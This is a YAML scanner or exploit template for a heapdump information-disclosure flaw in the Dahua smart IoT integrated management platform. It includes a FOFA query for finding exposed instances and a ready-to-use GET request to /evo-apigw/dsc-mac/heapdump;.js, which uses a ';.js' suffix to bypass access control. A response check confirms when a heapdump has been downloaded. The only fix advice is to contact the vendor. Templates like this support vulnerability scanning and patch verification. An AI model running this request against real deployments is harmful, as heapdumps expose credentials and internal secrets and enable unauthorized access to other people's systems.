product: 大华智能物联综合管理平台
vName: 大华智能物联综合管理平台 heapdump敏感信息泄漏
type: 信息泄漏
vID: [ ]
level: 2
vDesc: ''
version: ''
note: ''
search:
  FOFA: body="static/fontshd/font-hd.css" || body="客户端会小于800"
protocol: http
link: https://mp.weixin.qq.com/s/Ch1AXG3CSXcJkQyYvh9XMw
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /evo-apigw/dsc-mac/heapdump;.js
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - application/octet-stream
              - attachment; filename="heapdump
            logic: and